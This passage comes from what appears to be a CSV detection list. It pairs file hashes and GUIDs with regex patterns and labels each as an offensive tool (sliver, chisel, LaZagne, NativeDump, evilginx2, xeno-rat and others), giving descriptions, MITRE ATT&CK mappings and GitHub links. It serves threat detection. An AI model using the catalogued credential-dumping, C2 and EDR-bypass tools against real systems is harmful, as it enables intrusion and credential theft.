T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559*",".{0,1000}9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654*",".{0,1000}9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a*",".{0,1000}9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234*",".{0,1000}9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16*",".{0,1000}9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b*",".{0,1000}9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5*",".{0,1000}9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894*",".{0,1000}9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*9B823D93-BF1B-407B-A4CD-231347F656AD*",".{0,1000}9B823D93\-BF1B\-407B\-A4CD\-231347F656AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551*",".{0,1000}9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*",".{0,1000}9b9850751be2515c8231e5189015bbe6\:49ef7638d69a01f26d96ed673bf50c45.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235*",".{0,1000}9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684*",".{0,1000}9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*9bd15de627aa46533968e0f7fae19e8b855d0a40*",".{0,1000}9bd15de627aa46533968e0f7fae19e8b855d0a40.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*",".{0,1000}9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323*",".{0,1000}9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62*",".{0,1000}9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02*",".{0,1000}9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630*",".{0,1000}9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308*",".{0,1000}9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670*",".{0,1000}9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5*",".{0,1000}9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd*",".{0,1000}9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*9CCE5C71-14B4-4A08-958D-4E593975658B*",".{0,1000}9CCE5C71\-14B4\-4A08\-958D\-4E593975658B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03*",".{0,1000}9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6*",".{0,1000}9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*",".{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3*",".{0,1000}9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745*",".{0,1000}9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*",".{0,1000}9D365106\-D7B8\-4B5E\-82CC\-6D6ABCDCA2B8.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6*",".{0,1000}9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912*",".{0,1000}9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced*",".{0,1000}9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c*",".{0,1000}9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7*",".{0,1000}9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89*",".{0,1000}9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13*",".{0,1000}9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9E357027-8AA6-4376-8146-F5AF610E14BB*",".{0,1000}9E357027\-8AA6\-4376\-8146\-F5AF610E14BB.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*9E5A6F99-0A26-4959-847D-A4221CF4441B*",".{0,1000}9E5A6F99\-0A26\-4959\-847D\-A4221CF4441B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537*",".{0,1000}9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf*",".{0,1000}9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea*",".{0,1000}9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d*",".{0,1000}9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f*",".{0,1000}9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*9EB8DC3B-60DC-451E-8C18-3D7E38D463FD*",".{0,1000}9EB8DC3B\-60DC\-451E\-8C18\-3D7E38D463FD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d*",".{0,1000}9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*9EE27D63-6AC9-4037-860B-44E91BAE7F0D*",".{0,1000}9EE27D63\-6AC9\-4037\-860B\-44E91BAE7F0D.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 